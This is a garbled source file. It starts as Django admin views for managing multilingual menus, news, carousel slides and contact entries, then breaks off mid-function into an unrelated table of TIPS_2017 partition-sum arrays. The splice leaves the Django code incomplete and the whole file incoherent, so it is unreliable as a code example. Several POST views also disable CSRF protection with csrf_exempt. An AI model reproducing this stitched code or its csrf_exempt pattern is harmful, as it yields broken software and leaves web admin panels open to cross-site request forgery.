sm_one = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order))
sm_two = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order) + 1)
sm_one.menu_order = int(menu_order) + 1
sm_two.menu_order = int(menu_order)
sm_one.save()
sm_two.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=success&i=v1")
@login_required
def change_menu_dir(request):
menu = request.GET.get("menu")
menu_order = request.GET.get("menu_order")
sm_nub = 1
if int(menu_order) <= sm_nub:
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=error&i=v1")
print(int(menu), int(menu_order))
sm_one = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order) - 1)
sm_two = SmAdminMenu.objects.get(parent_id=int(menu), menu_order=int(menu_order))
sm_one.menu_order = int(menu_order)
sm_two.menu_order = int(menu_order) - 1
sm_one.save()
sm_two.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html?h=success&i=v1")
@method_decorator(login_required, name="dispatch")
class change_url_info(View):
def get(self, request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
index_info = IndexInfo.objects.get(id=menu_order)
print(index_info)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-urlinfo.html",
{"header_info": header_info, "index_info": index_info})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
menu = request.GET.get("menu")
page_info = request.POST.get("page_info", "")
page_where = request.POST.get("page_where", "")
page_url = request.POST.get("page_url", "")
page_name_zh_hant = request.POST.get("page_name_zh_hant", "")
page_name_zh_hans = request.POST.get("page_name_zh_hans", "")
page_name_en = request.POST.get("page_name_en", "")
page_name_fr = request.POST.get("page_name_fr", "")
page_name_es = request.POST.get("page_name_es", "")
page_name_pt = request.POST.get("page_name_pt", "")
print("POST不打開", page_where, menu, page_info, page_url)
IndexInfo.objects.filter(id=menu).update(page_info=page_info, page_where=page_where, page_url=page_url,
page_name_zh_hant=page_name_zh_hant,
page_name_zh_hans=page_name_zh_hans, page_name_en=page_name_en,
page_name_fr=page_name_fr, page_name_es=page_name_es,
page_name_pt=page_name_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@method_decorator(login_required, name="dispatch")
class add_news_list(View):
def get(self, request):
header_info = getheader_info(request)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/newslist/add-news-list.html",
{"header_info": header_info})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
news_name = request.POST.get("news_name", "")
news_url = request.POST.get("news_url", "")
news_info_zh_hant = request.POST.get("news_info_zh_hant", "")
news_info_zh_hans = request.POST.get("news_info_zh_hans", "")
news_info_en = request.POST.get("news_info_en", "")
news_info_fr = request.POST.get("news_info_fr", "")
news_info_es = request.POST.get("news_info_es", "")
news_info_pt = request.POST.get("news_info_pt", "")
NewsInfo.objects.create(news_name=news_name, news_url=news_url, news_info_zh_hant=news_info_zh_hant,
news_info_zh_hans=news_info_zh_hans, news_info_en=news_info_en,
news_info_fr=news_info_fr, news_info_es=news_info_es, news_info_pt=news_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@method_decorator(login_required, name="dispatch")
class change_news_list(View):
def get(self, request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
news_info = NewsInfo.objects.get(id=menu_order)
print(news_info)
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/newslist/change-news-list.html",
{"header_info": header_info, "news_info": news_info})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
menu = request.GET.get("menu")
news_name = request.POST.get("news_name", "")
news_url = request.POST.get("news_url", "")
news_info_zh_hant = request.POST.get("news_info_zh_hant", "")
news_info_zh_hans = request.POST.get("news_info_zh_hans", "")
news_info_en = request.POST.get("news_info_en", "")
news_info_fr = request.POST.get("news_info_fr", "")
news_info_es = request.POST.get("news_info_es", "")
news_info_pt = request.POST.get("news_info_pt", "")
NewsInfo.objects.filter(id=menu).update(news_name=news_name, news_url=news_url,
news_info_zh_hant=news_info_zh_hant,
news_info_zh_hans=news_info_zh_hans, news_info_en=news_info_en,
news_info_fr=news_info_fr, news_info_es=news_info_es,
news_info_pt=news_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@login_required
def del_news_list(request):
menu = request.GET.get("menu_order", "")
NewsInfo.objects.filter(id=menu).delete()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
@method_decorator(login_required, name="dispatch")
class add_homecarousel(View):
def get(self, request):
header_info = getheader_info(request)
count = CarouselDisplay.objects.all().count() + 1
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/homecarousel/add-homecarousel.html",
{"header_info": header_info, 'count': count})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
carousel_nub = CarouselDisplay.objects.all().count() + 1
carousel_img = request.FILES['carousel_img']
carousel_url = request.POST.get("carousel_url", "")
carousel_info_zh_hant = request.POST.get("carousel_info_zh_hant", "")
carousel_info_zh_hans = request.POST.get("carousel_info_zh_hans", "")
carousel_info_en = request.POST.get("carousel_info_en", "")
carousel_info_fr = request.POST.get("carousel_info_fr", "")
carousel_info_es = request.POST.get("carousel_info_es", "")
carousel_info_pt = request.POST.get("carousel_info_pt", "")
# add_homecarousel
carousel_display = CarouselDisplay.objects.create(carousel_nub=carousel_nub, carousel_url=carousel_url,
carousel_info_zh_hant=carousel_info_zh_hant,
carousel_info_zh_hans=carousel_info_zh_hans,
carousel_info_en=carousel_info_en,
carousel_info_fr=carousel_info_fr,
carousel_info_es=carousel_info_es,
carousel_info_pt=carousel_info_pt)
carousel_display.carousel_img.save('card' + str(time.time())[0:9] + ".jpg",
carousel_img, save=True)
carousel_display.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@method_decorator(login_required, name="dispatch")
class change_homecarousel(View):
def get(self, request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
carousel_display = CarouselDisplay.objects.get(id=menu_order)
return render(request,
"backstage/userauth/pagefile/base/headerindex/addform/page/homecarousel/change-homecarousel.html",
{"header_info": header_info, "carousel_display": carousel_display})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
menu_order = request.GET.get("menu_order")
carousel_url = request.POST.get("carousel_url", "")
# the replacement image is optional when editing an existing slide
carousel_img = request.FILES.get('carousel_img')
carousel_info_zh_hant = request.POST.get("carousel_info_zh_hant", "")
carousel_info_zh_hans = request.POST.get("carousel_info_zh_hans", "")
carousel_info_en = request.POST.get("carousel_info_en", "")
carousel_info_fr = request.POST.get("carousel_info_fr", "")
carousel_info_es = request.POST.get("carousel_info_es", "")
carousel_info_pt = request.POST.get("carousel_info_pt", "")
carousel_display = CarouselDisplay.objects.get(carousel_nub=menu_order)
carousel_display.carousel_url = carousel_url
carousel_display.carousel_info_zh_hant = carousel_info_zh_hant
carousel_display.carousel_info_zh_hans = carousel_info_zh_hans
carousel_display.carousel_info_en = carousel_info_en
carousel_display.carousel_info_fr = carousel_info_fr
carousel_display.carousel_info_es = carousel_info_es
carousel_display.carousel_info_pt = carousel_info_pt
if carousel_img is not None:
carousel_display.carousel_img.save('card' + str(time.time())[0:9] + ".jpg",
carousel_img, save=True)
carousel_display.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def del_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
CarouselDisplay.objects.get(carousel_nub=menu_order).delete()
print(menu_order, menu_count)
for nub in range(int(menu_order), menu_count + 1):
print(nub, menu_order, menu_count)
CarouselDisplay.objects.filter(carousel_nub=nub + 1).update(carousel_nub=nub)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def up_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
if 1 < int(menu_order) <= menu_count:
c1 = CarouselDisplay.objects.get(carousel_nub=menu_order)
c2 = CarouselDisplay.objects.get(carousel_nub=int(menu_order) - 1)
c1.carousel_nub = int(menu_order) - 1
c2.carousel_nub = int(menu_order)
c1.save()
c2.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@login_required
def down_homecarousel(request):
menu_order = request.GET.get("menu_order")
menu_count = CarouselDisplay.objects.all().count()
if 1 <= int(menu_order) < menu_count:
c1 = CarouselDisplay.objects.get(carousel_nub=menu_order)
c2 = CarouselDisplay.objects.get(carousel_nub=int(menu_order) + 1)
c1.carousel_nub = int(menu_order) + 1
c2.carousel_nub = int(menu_order)
c1.save()
c2.save()
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html#homecarousel")
@method_decorator(login_required, name="dispatch")
class change_enter_info(View):
def get(self, request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
index_info = ContactInfo.objects.get(id=menu_order)
print(index_info)
return render(request, "backstage/userauth/pagefile/base/headerindex/addform/page/change-enterinfo.html",
{"header_info": header_info, "index_info": index_info})
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
menu = request.GET.get("menu")
contact_nub = request.POST.get("contact_nub", "")
contact_name = request.POST.get("contact_name", "")
contact_url = request.POST.get("contact_url", "")
contact_info_zh_hant = request.POST.get("contact_info_zh_hant", "")
contact_info_zh_hans = request.POST.get("contact_info_zh_hans", "")
contact_info_en = request.POST.get("contact_info_en", "")
contact_info_fr = request.POST.get("contact_info_fr", "")
contact_info_es = request.POST.get("contact_info_es", "")
contact_info_pt = request.POST.get("contact_info_pt", "")
print("POST不打開", contact_nub, menu, contact_name, contact_url)
ContactInfo.objects.filter(id=menu).update(contact_nub=contact_nub, contact_name=contact_name,
contact_url=contact_url,
contact_info_zh_hant=contact_info_zh_hant,
contact_info_zh_hans=contact_info_zh_hans,
contact_info_en=contact_info_en,
contact_info_fr=contact_info_fr, contact_info_es=contact_info_es,
contact_info_pt=contact_info_pt)
return HttpResponseRedirect("/management-admin/basicinfo/header_index.html")
# ************************************ *******************************************#
# carousel_list
class add_carousel_list(View):
@method_decorator(login_required)
def get(self, request):
header_info = getheader_info(request)
count = ColumnListsInfo.objects.all().count() + 1
return render(request,
"backstage/userauth/pagefile/base/footerindex/addform/page/homecarousel/add-homecarousel.html",
{"header_info": header_info,'count':count})
@method_decorator(login_required)
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
column_lists_nub = ColumnListsInfo.objects.all().count() + 1
column_url = request.POST.get("column_url", "")
column_lists_img = request.FILES['column_lists_img']
column_lists_title_zh_hant = request.POST.get("column_lists_title_zh_hant", "")
column_lists_title_zh_hans = request.POST.get("column_lists_title_zh_hans", "")
column_lists_title_en = request.POST.get("column_lists_title_en", "")
column_lists_title_fr = request.POST.get("column_lists_title_fr", "")
column_lists_title_es = request.POST.get("column_lists_title_es", "")
column_lists_title_pt = request.POST.get("column_lists_title_pt", "")
column_lists_subtitle_zh_hant = request.POST.get("column_lists_subtitle_zh_hant", "")
column_lists_subtitle_zh_hans = request.POST.get("column_lists_subtitle_zh_hans", "")
column_lists_subtitle_en = request.POST.get("column_lists_subtitle_en", "")
column_lists_subtitle_fr = request.POST.get("column_lists_subtitle_fr", "")
column_lists_subtitle_es = request.POST.get("column_lists_subtitle_es", "")
column_lists_subtitle_pt = request.POST.get("column_lists_subtitle_pt", "")
column_lists_alt_zh_hant = request.POST.get("column_lists_alt_zh_hant", "")
column_lists_alt_zh_hans = request.POST.get("column_lists_alt_zh_hans", "")
column_lists_alt_en = request.POST.get("column_lists_alt_en", "")
column_lists_alt_fr = request.POST.get("column_lists_alt_fr", "")
column_lists_alt_es = request.POST.get("column_lists_alt_es", "")
column_lists_alt_pt = request.POST.get("column_lists_alt_pt", "")
column_lists = ColumnListsInfo.objects.create(column_lists_nub=column_lists_nub, column_url=column_url,
column_lists_title_zh_hant=column_lists_title_zh_hant,
column_lists_title_zh_hans=column_lists_title_zh_hans,
column_lists_title_en=column_lists_title_en,
column_lists_title_fr=column_lists_title_fr,
column_lists_title_es=column_lists_title_es,
column_lists_title_pt=column_lists_title_pt,
column_lists_subtitle_zh_hant=column_lists_subtitle_zh_hant,
column_lists_subtitle_zh_hans=column_lists_subtitle_zh_hans,
column_lists_subtitle_en=column_lists_subtitle_en,
column_lists_subtitle_fr=column_lists_subtitle_fr,
column_lists_subtitle_es=column_lists_subtitle_es,
column_lists_subtitle_pt=column_lists_subtitle_pt,
column_lists_alt_zh_hant=column_lists_alt_zh_hant,
column_lists_alt_zh_hans=column_lists_alt_zh_hans,
column_lists_alt_en=column_lists_alt_en,
column_lists_alt_fr=column_lists_alt_fr,
column_lists_alt_es=column_lists_alt_es,
column_lists_alt_pt=column_lists_alt_pt,
)
column_lists.column_lists_img.save('card' + str(time.time())[0:9] + ".jpg",
column_lists_img, save=True)
column_lists.save()
return HttpResponseRedirect("/management-admin/basicinfo/footer_index.html")
class change_carousel_lists(View):
@method_decorator(login_required)
def get(self, request):
header_info = getheader_info(request)
menu_order = request.GET.get("menu_order")
carousel_display = ColumnListsInfo.objects.get(id=menu_order)
return render(request,
"backstage/userauth/pagefile/base/footerindex/addform/page/homecarousel/change-homecarousel.html",
{"header_info": header_info, "carousel_display": carousel_display})
@method_decorator(login_required)
@method_decorator(csrf_exempt)
@method_decorator(require_http_methods(["POST"]))
def post(self, request):
column_lists_nub = request.GET.get("menu_order", "")
column_url = request.POST.get("column_url", "")
# the replacement image is optional when editing an existing entry
column_lists_img = request.FILES.get('column_lists_img')
print(column_lists_nub)
column_lists_title_zh_hant = request.POST.get("column_lists_title_zh_hant", "")
column_lists_title_zh_hans = request.POST.get("column_lists_title_zh_hans", "")
column_lists_title_zh_en = request.POST.get("column_lists_title_en", "")
column_lists_title_fr = request.POST.get("column_lists_title_fr", "")
column_lists_title_es = request.POST.get("column_lists_title_es", "")
column_lists_title_pt = request.POST.get("column_lists_title_pt", "")
column_lists_subtitle_zh_hant = request.POST.get("column_lists_subtitle_zh_hant", "")
column_lists_subtitle_zh_hans = request.POST.get("column_lists_subtitle_zh_hans", "")
1.220342E+04,
1.225845E+04, 1.231360E+04, 1.236889E+04, 1.242431E+04, 1.247985E+04, 1.253553E+04,
1.259134E+04, 1.264728E+04, 1.270335E+04, 1.275955E+04, 1.281589E+04, 1.287235E+04,
1.292894E+04, 1.298567E+04, 1.304252E+04, 1.309951E+04, 1.315662E+04, 1.321387E+04,
1.327125E+04, 1.332876E+04, 1.338640E+04, 1.344417E+04, 1.350207E+04, 1.356010E+04,
1.361826E+04,
])
# ---------------------- M = 5, I = 8 ---------------------------
M = 5
I = 8
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[3]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
1.024260E+00, 8.644900E+00, 1.694486E+01, 2.524838E+01, 3.355335E+01, 4.185935E+01,
5.016626E+01, 5.847401E+01, 6.678257E+01, 7.509194E+01, 8.340213E+01, 9.171321E+01,
1.000254E+02, 1.083389E+02, 1.166545E+02, 1.249731E+02, 1.332960E+02, 1.416249E+02,
1.499621E+02, 1.583101E+02, 1.666720E+02, 1.750509E+02, 1.834505E+02, 1.918746E+02,
2.003270E+02, 2.088118E+02, 2.173329E+02, 2.258944E+02, 2.345004E+02, 2.431546E+02,
2.518609E+02, 2.606229E+02, 2.694442E+02, 2.783282E+02, 2.872781E+02, 2.962969E+02,
3.053877E+02, 3.145531E+02, 3.237958E+02, 3.331182E+02, 3.425226E+02, 3.520113E+02,
3.615863E+02, 3.712495E+02, 3.810028E+02, 3.908478E+02, 4.007862E+02, 4.108194E+02,
4.209489E+02, 4.311760E+02, 4.415019E+02, 4.519278E+02, 4.624548E+02, 4.730840E+02,
4.838163E+02, 4.946525E+02, 5.055937E+02, 5.166406E+02, 5.277939E+02, 5.390545E+02,
5.504229E+02, 5.618998E+02, 5.734859E+02, 5.851816E+02, 5.969876E+02, 6.089044E+02,
6.209324E+02, 6.330722E+02, 6.453241E+02, 6.576887E+02, 6.701662E+02, 6.827571E+02,
6.954618E+02, 7.082806E+02, 7.212138E+02, 7.342617E+02, 7.474247E+02, 7.607031E+02,
7.740971E+02, 7.876070E+02, 8.012330E+02, 8.149755E+02, 8.288346E+02, 8.428107E+02,
8.569038E+02, 8.711142E+02, 8.854422E+02, 8.998879E+02, 9.144515E+02, 9.291333E+02,
9.439334E+02, 9.588519E+02, 9.738891E+02, 9.890452E+02, 1.004320E+03, 1.019714E+03,
1.035228E+03, 1.050861E+03, 1.066613E+03, 1.082486E+03, 1.098478E+03, 1.114590E+03,
1.130822E+03, 1.147175E+03, 1.163648E+03, 1.180242E+03, 1.196956E+03, 1.213792E+03,
1.230748E+03, 1.247825E+03, 1.265023E+03, 1.282343E+03, 1.299784E+03, 1.317346E+03,
1.335031E+03, 1.352836E+03, 1.370764E+03, 1.388814E+03, 1.406986E+03, 1.425280E+03,
1.443696E+03, 1.462234E+03, 1.480895E+03, 1.499679E+03, 1.518585E+03, 1.537614E+03,
1.556766E+03, 1.576041E+03, 1.595439E+03, 1.614960E+03, 1.634605E+03, 1.654372E+03,
1.674264E+03, 1.694278E+03, 1.714417E+03, 1.734679E+03, 1.755065E+03, 1.775574E+03,
1.796208E+03, 1.816966E+03, 1.837848E+03, 1.858855E+03, 1.879985E+03, 1.901240E+03,
1.922620E+03, 1.944124E+03, 1.965753E+03, 1.987507E+03, 2.009386E+03, 2.031390E+03,
2.053519E+03, 2.075772E+03, 2.098152E+03, 2.120656E+03, 2.143286E+03, 2.166041E+03,
2.188922E+03, 2.211929E+03, 2.235061E+03, 2.258320E+03, 2.281704E+03, 2.305214E+03,
2.328850E+03, 2.352613E+03, 2.376502E+03, 2.400517E+03, 2.424658E+03, 2.448926E+03,
2.473321E+03, 2.497842E+03, 2.522490E+03, 2.547265E+03, 2.572167E+03, 2.597196E+03,
2.622352E+03, 2.647635E+03, 2.673046E+03, 2.698584E+03, 2.724249E+03, 2.750042E+03,
2.775962E+03, 2.802011E+03, 2.828187E+03, 2.854490E+03, 2.880922E+03, 2.907482E+03,
2.934170E+03, 2.960986E+03, 2.987930E+03, 3.015003E+03, 3.042204E+03, 3.069534E+03,
3.096992E+03, 3.124579E+03, 3.152295E+03, 3.180140E+03, 3.208113E+03, 3.236216E+03,
3.264448E+03, 3.292809E+03, 3.321299E+03, 3.349918E+03, 3.378667E+03, 3.407546E+03,
3.436554E+03, 3.465692E+03, 3.494959E+03, 3.524357E+03, 3.553884E+03, 3.583542E+03,
3.613329E+03, 3.643247E+03, 3.673295E+03, 3.703473E+03, 3.733781E+03, 3.764221E+03,
3.794790E+03, 3.825491E+03, 3.856322E+03, 3.887284E+03, 3.918377E+03, 3.949600E+03,
3.980955E+03, 4.012441E+03, 4.044059E+03, 4.075807E+03, 4.107687E+03, 4.139699E+03,
4.171842E+03, 4.204116E+03, 4.236523E+03, 4.269061E+03, 4.301731E+03, 4.334532E+03,
4.367466E+03, 4.400532E+03, 4.433731E+03, 4.467061E+03, 4.500524E+03, 4.534119E+03,
4.567847E+03, 4.601707E+03, 4.635700E+03, 4.669825E+03, 4.704084E+03, 4.738475E+03,
4.772999E+03, 4.807656E+03, 4.842447E+03, 4.877370E+03, 4.912427E+03, 4.947617E+03,
4.982940E+03, 5.018397E+03, 5.053988E+03, 5.089712E+03, 5.125570E+03, 5.161561E+03,
5.197686E+03, 5.233946E+03, 5.270339E+03, 5.306866E+03, 5.343528E+03, 5.380323E+03,
5.417253E+03, 5.454318E+03, 5.491516E+03, 5.528849E+03, 5.566317E+03, 5.603919E+03,
5.641656E+03, 5.679528E+03, 5.717535E+03, 5.755676E+03, 5.793953E+03, 5.832364E+03,
5.870911E+03, 5.909592E+03, 5.948409E+03, 5.987362E+03, 6.026449E+03, 6.065672E+03,
6.105031E+03, 6.144525E+03, 6.184155E+03, 6.223920E+03, 6.263821E+03, 6.303858E+03,
6.344031E+03, 6.384340E+03, 6.424784E+03, 6.465365E+03, 6.506082E+03, 6.546935E+03,
6.587924E+03, 6.629050E+03, 6.670312E+03, 6.711710E+03, 6.753245E+03, 6.794916E+03,
6.836724E+03, 6.878669E+03, 6.920750E+03, 6.962968E+03, 7.005323E+03, 7.047814E+03,
7.090443E+03, 7.133208E+03, 7.176111E+03, 7.219151E+03, 7.262327E+03, 7.305641E+03,
7.349092E+03, 7.392681E+03, 7.436407E+03, 7.480270E+03, 7.524270E+03, 7.568408E+03,
7.612684E+03, 7.657097E+03, 7.701647E+03, 7.746336E+03, 7.791162E+03, 7.836126E+03,
7.881227E+03, 7.926467E+03, 7.971844E+03, 8.017359E+03, 8.063013E+03, 8.108804E+03,
8.154733E+03, 8.200801E+03, 8.247006E+03, 8.293350E+03, 8.339832E+03, 8.386452E+03,
8.433210E+03, 8.480107E+03, 8.527142E+03, 8.574316E+03, 8.621628E+03, 8.669078E+03,
8.716667E+03, 8.764395E+03, 8.812261E+03, 8.860266E+03, 8.908409E+03, 8.956691E+03,
9.005112E+03, 9.053671E+03, 9.102369E+03, 9.151206E+03, 9.200182E+03, 9.249297E+03,
9.298551E+03, 9.347943E+03, 9.397474E+03, 9.447145E+03, 9.496954E+03, 9.546902E+03,
9.596990E+03, 9.647216E+03, 9.697582E+03, 9.748087E+03, 9.798730E+03, 9.849513E+03,
9.900435E+03, 9.951496E+03, 1.000270E+04, 1.005404E+04, 1.010552E+04, 1.015713E+04,
1.020889E+04, 1.026079E+04, 1.031282E+04, 1.036500E+04, 1.041731E+04, 1.046977E+04,
1.052236E+04, 1.057509E+04, 1.062797E+04, 1.068098E+04, 1.073413E+04, 1.078742E+04,
1.084085E+04, 1.089442E+04, 1.094813E+04, 1.100198E+04, 1.105596E+04, 1.111009E+04,
1.116436E+04, 1.121876E+04, 1.127331E+04, 1.132799E+04, 1.138282E+04, 1.143778E+04,
1.149289E+04, 1.154813E+04, 1.160351E+04, 1.165903E+04, 1.171470E+04, 1.177050E+04,
1.182644E+04, 1.188252E+04, 1.193874E+04, 1.199510E+04, 1.205159E+04, 1.210823E+04,
1.216501E+04, 1.222193E+04, 1.227898E+04, 1.233618E+04, 1.239351E+04, 1.245099E+04,
1.250860E+04, 1.256636E+04, 1.262425E+04, 1.268228E+04, 1.274045E+04, 1.279876E+04,
1.285722E+04, 1.291581E+04, 1.297453E+04, 1.303340E+04, 1.309241E+04, 1.315156E+04,
1.321084E+04, 1.327027E+04, 1.332983E+04, 1.338954E+04, 1.344938E+04, 1.350936E+04,
1.356949E+04, 1.362975E+04, 1.369015E+04, 1.375069E+04, 1.381136E+04, 1.387218E+04,
1.393314E+04, 1.399423E+04, 1.405547E+04, 1.411684E+04, 1.417835E+04, 1.424000E+04,
1.430179E+04, 1.436372E+04, 1.442579E+04, 1.448799E+04, 1.455034E+04, 1.461282E+04,
1.467545E+04,
])
# ---------------------- M = 5, I = 9 ---------------------------
M = 5
I = 9
TIPS_2017_ISOT_HASH[(M,I)] = TIPS_2017_ISOT[3]
TIPS_2017_ISOQ_HASH[(M,I)] = float64([
6.128630E+00, 5.062329E+01, 9.917483E+01, 1.477481E+02, 1.963300E+02, 2.449180E+02,
2.935114E+02, 3.421098E+02, 3.907129E+02, 4.393208E+02, 4.879334E+02, 5.365511E+02,
5.851749E+02, 6.338065E+02, 6.824492E+02, 7.311080E+02, 7.797902E+02, 8.285052E+02,
8.772651E+02, 9.260840E+02, 9.749786E+02, 1.023967E+03, 1.073070E+03, 1.122307E+03,
1.171702E+03, 1.221277E+03, 1.271055E+03, 1.321059E+03, 1.371312E+03, 1.421836E+03,
1.472653E+03, 1.523784E+03, 1.575250E+03, 1.627071E+03, 1.679265E+03, 1.731850E+03,
1.784843E+03, 1.838260E+03, 1.892117E+03, 1.946428E+03, 2.001207E+03, 2.056467E+03,
2.112219E+03, 2.168475E+03, 2.225246E+03, 2.282542E+03, 2.340373E+03, 2.398746E+03,
2.457671E+03, 2.517156E+03, 2.577207E+03, 2.637832E+03, 2.699037E+03, 2.760829E+03,
2.823213E+03, 2.886195E+03, 2.949779E+03, 3.013971E+03, 3.078775E+03, 3.144196E+03,
3.210237E+03, 3.276902E+03, 3.344196E+03, 3.412121E+03, 3.480680E+03, 3.549878E+03,
3.619716E+03, 3.690198E+03, 3.761326E+03, 3.833102E+03, 3.905530E+03, 3.978611E+03,
4.052348E+03, 4.126742E+03, 4.201796E+03, 4.277511E+03, 4.353890E+03, 4.430934E+03,
4.508645E+03, 4.587024E+03, 4.666073E+03, 4.745793E+03, 4.826187E+03, 4.907254E+03,
4.988997E+03, 5.071417E+03, 5.154515E+03, 5.238293E+03, 5.322751E+03, 5.407890E+03,
5.493712E+03, 5.580218E+03, 5.667408E+03, 5.755285E+03, 5.843848E+03, 5.933099E+03,
6.023038E+03, 6.113667E+03, 6.204986E+03, 6.296996E+03, 6.389699E+03, 6.483094E+03,
6.577183E+03, 6.671967E+03, 6.767446E+03, 6.863621E+03, 6.960492E+03, 7.058061E+03,
7.156329E+03, 7.255295E+03, 7.354961E+03, 7.455327E+03, 7.556394E+03, 7.658162E+03,
7.760633E+03, 7.863807E+03, 7.967684E+03, 8.072266E+03, 8.177552E+03, 8.283544E+03,
8.390242E+03, 8.497647E+03, 8.605758E+03, 8.714578E+03, 8.824106E+03, 8.934343E+03,
9.045289E+03, 9.156946E+03, 9.269313E+03, 9.382392E+03, 9.496182E+03, 9.610685E+03,
9.725901E+03, 9.841830E+03, 9.958473E+03, 1.007583E+04, 1.019390E+04, 1.031269E+04,
1.043220E+04, 1.055242E+04, 1.067336E+04, 1.079501E+04, 1.091739E+04, 1.104048E+04,
1.116429E+04, 1.128882E+04, 1.141408E+04, 1.154005E+04, 1.166674E+04, 1.179416E+04,
1.192230E+04, 1.205116E+04, 1.218075E+04, 1.231106E+04, 1.244209E+04, 1.257385E+04,
1.270633E+04, 1.283954E+04, 1.297348E+04, 1.310814E+04, 1.324353E+04, 1.337965E+04,
1.351649E+04, 1.365407E+04, 1.379237E+04, 1.393140E+04, 1.407117E+04, 1.421166E+04,
1.435289E+04, 1.449485E+04, 1.463754E+04, 1.478096E+04, 1.492512E+04, 1.507001E+04,
1.521563E+04, 1.536199E+04, 1.550909E+04, 1.565692E+04, 1.580548E+04, 1.595479E+04,
1.610483E+04, 1.625560E+04, 1.640712E+04, 1.655937E+04, 1.671237E+04, 1.686610E+04,
1.702057E+04, 1.717579E+04, 1.733174E+04, 1.748844E+04, 1.764588E+04, 1.780406E+04,
1.796298E+04, 1.812265E+04, 1.828306E+04, 1.844421E+04, 1.860611E+04, 1.876876E+04,
1.893215E+04, 1.909629E+04, 1.926117E+04, 1.942680E+04, 1.959318E+04, 1.976031E+04,
1.992819E+04, 2.009681E+04, 2.026619E+04, 2.043631E+04, 2.060719E+04, 2.077882E+04,
2.095120E+04, 2.112433E+04, 2.129821E+04, 2.147285E+04, 2.164824E+04, 2.182438E+04,
2.200128E+04, 2.217893E+04, 2.235734E+04, 2.253651E+04, 2.271643E+04, 2.289711E+04,
2.307854E+04, 2.326073E+04, 2.344368E+04, 2.362739E+04, 2.381186E+04, 2.399709E+04,
2.418308E+04, 2.436983E+04, 2.455734E+04, 2.474561E+04, 2.493464E+04, 2.512444E+04,
2.531500E+04, 2.550632E+04, 2.569841E+04, 2.589126E+04, 2.608487E+04, 2.627925E+04,
2.647440E+04, 2.667031E+04, 2.686699E+04, 2.706444E+04, 2.726265E+04, 2.746163E+04,
2.766138E+04, 2.786190E+04, 2.806319E+04, 2.826524E+04, 2.846807E+04, 2.867167E+04,
2.887604E+04, 2.908118E+04, 2.928709E+04, 2.949378E+04, 2.970124E+04, 2.990947E+04,
3.011847E+04, 3.032825E+04, 3.053880E+04, 3.075013E+04, 3.096224E+04, 3.117512E+04,
3.138877E+04, 3.160321E+04, 3.181842E+04, 3.203441E+04, 3.225117E+04, 3.246872E+04,
3.268704E+04, 3.290614E+04, 3.312602E+04, 3.334669E+04, 3.356813E+04, 3.379035E+04,
3.401336E+04, 3.423714E+04, 3.446171E+04, 3.468706E+04, 3.491320E+04, 3.514011E+04,
3.536782E+04, 3.559630E+04, 3.582557E+04, 3.605563E+04, 3.628647E+04, 3.651809E+04,
3.675050E+04, 3.698370E+04, 3.721769E+04, 3.745246E+04, 3.768802E+04, 3.792437E+04,
3.816150E+04, 3.839943E+04, 3.863814E+04, 3.887764E+04, 3.911794E+04, 3.935902E+04,
3.960089E+04, 3.984356E+04, 4.008701E+04, 4.033126E+04, 4.057630E+04, 4.082213E+04,
4.106875E+04, 4.131617E+04, 4.156438E+04, 4.181338E+04, 4.206318E+04, 4.231377E+04,
4.256515E+04, 4.281734E+04, 4.307031E+04, 4.332408E+04, 4.357865E+04, 4.383401E+04,
4.409017E+04, 4.434713E+04, 4.460488E+04, 4.486344E+04, 4.512278E+04, 4.538293E+04,
4.564388E+04, 4.590562E+04, 4.616816E+04, 4.643150E+04, 4.669564E+04, 4.696058E+04,
4.722632E+04, 4.749286E+04, 4.776021E+04, 4.802835E+04, 4.829729E+04, 4.856703E+04,
4.883758E+04, 4.910893E+04, 4.938108E+04, 4.965403E+04, 4.992778E+04, 5.020234E+04,
5.047770E+04, 5.075386E+04, 5.103083E+04, 5.130860E+04, 5.158717E+04, 5.186655E+04,
5.214674E+04, 5.242772E+04, 5.270951E+04, 5.299211E+04, 5.327551E+04, 5.355972E+04,
5.384474E+04, 5.413056E+04, 5.441718E+04, 5.470461E+04, 5.499285E+04, 5.528189E+04,
5.557175E+04, 5.586240E+04, 5.615387E+04, 5.644614E+04, 5.673922E+04, 5.703311E+04,
